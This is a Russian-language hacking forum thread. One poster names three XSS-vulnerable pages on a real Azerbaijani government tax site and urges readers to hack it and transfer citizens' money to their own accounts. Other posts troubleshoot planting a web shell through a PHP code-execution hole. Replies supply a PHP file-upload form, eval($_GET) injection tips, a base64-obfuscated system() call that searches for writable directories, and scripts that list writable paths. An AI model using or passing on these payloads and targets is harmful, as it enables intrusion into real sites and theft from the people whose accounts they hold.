ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Значит кавычки шлифуются, всё понятно. Сделаю ссылку типа www.site.com/sссылка для сниффер/ и проверю.
Всем спасибо ребята.
И ещё хотел бы поделится с вами, я нашёл на одном сайте xss, а сайт не простой сайт, сайт государственный, на этом сайте у жителей всего Азербайджана, тоесть у миллионов азербайджанцев есть шот, они хранять свои денги. Есть некоторые у которых есть милйарды долларов на счёте. Пользовател может за минуту перевести все свои денги из счёта в другой счёт. Через xss думаю можно ломануть.
Вот сайт: http://www.e-taxes.gov.az/
xss: http://www.taxes.gov.az/?name=birpencere (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/TaxPayerChecker.jsp (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/edvPayerChecker.jsp (в поле пишем html команду).

Всего нашёл 3-е xss. И ещё скажу что сайт не сайт, а всё дырка!

Так-что ломайте перевадите денги на свой счёт и кайфуйте пока за вами не пришёл Азербайджанский ФБР.

Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:
То он успешно выполняется, но если залить такой:
То белая страница. Вот и всё...

Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые.

GET запросы могут фильтроваться. В смысле просто слово GET

Попробуй действовать через пост, например так:

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>


PS: неоднократно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"

В общем рыть в сторону POST вариантов, имхо

ЗЫЖ Плюс

eval($_GET['lol']);

можно смело заменить на

eval($_GET[lol]);

в прямом и переносном смысле - может быть будет другой результат, не мне тебе объяснять, что каждая ситуация всегда практически уникальна

Эксперементировать с ? и & после сам знаешь чего - как не тупо бы выглядело бы - результат иногда разный

а что ты передаеш в lol ??
и вообще должна быть ошибка Undefended variable $_GET['lol']

Ну а что там должно быть-то?
Не обязательно. Как раз белая страница может быть запросто
Покажешь пример?

ЧУДО! Спс, вот до этого я не допёр. Да, теперь этот код пашет. Но проблемма с заливкой нормального шелла всё ещё стоит...

Зачем? Вы же ГУРУ хакинга, наверное, даже скорее всего я несу бред. Но сегодня простительно Всех с праздником!

скорее всего только с правами на запись в папку, выполни такой код, чтобы найти сам знаешь что:

Поиск папки, доступной на запись:

0)<?
// это system('cd ../; find . -perm -2 -type d -ls');
eval(base64_decode(c3lzdGVtKCdjZCAuLi87IGZpbmQgLiA tcGVybSAtMiAtdHlwZSBkIC1scycpOw));
?>

1) $dirs=scandir($_SERVER['DOCUMENT_ROOT']);foreach($dirs as $whot) {if(is_dir($whot) && is_writable($whot)){echo "writeable dir: $whot";}}

2) echo '<pre>';$path = '/абсолютный_путь/http';function fold($rootDir, $allData=array()){$invisibleFileNames = array(".", "..");$dirContent = scandir($rootDir);foreach($dirContent as $key => $content){$path = $rootDir.'/'.$content;if(!in_array($content,$invisibleFileNam es)){if(is_file($path) && is_writable($path)){$allData[] = $path; }elseif(is_dir($path) && is_writable($path)){$allData = fold($path, $allData);}}}return $allData;}$a = fold($path);print_r($a);echo '</pre>';

Про запись в папку это и так думаю понятно, в противном случае я никаких файлов создать бы там не смог. Папка на запись есть.

Но судя по всему даже через Базу 64 образуется типа \' что то в этом роде, что и делает скрипт нерабочим... хз даже чё тут придумать.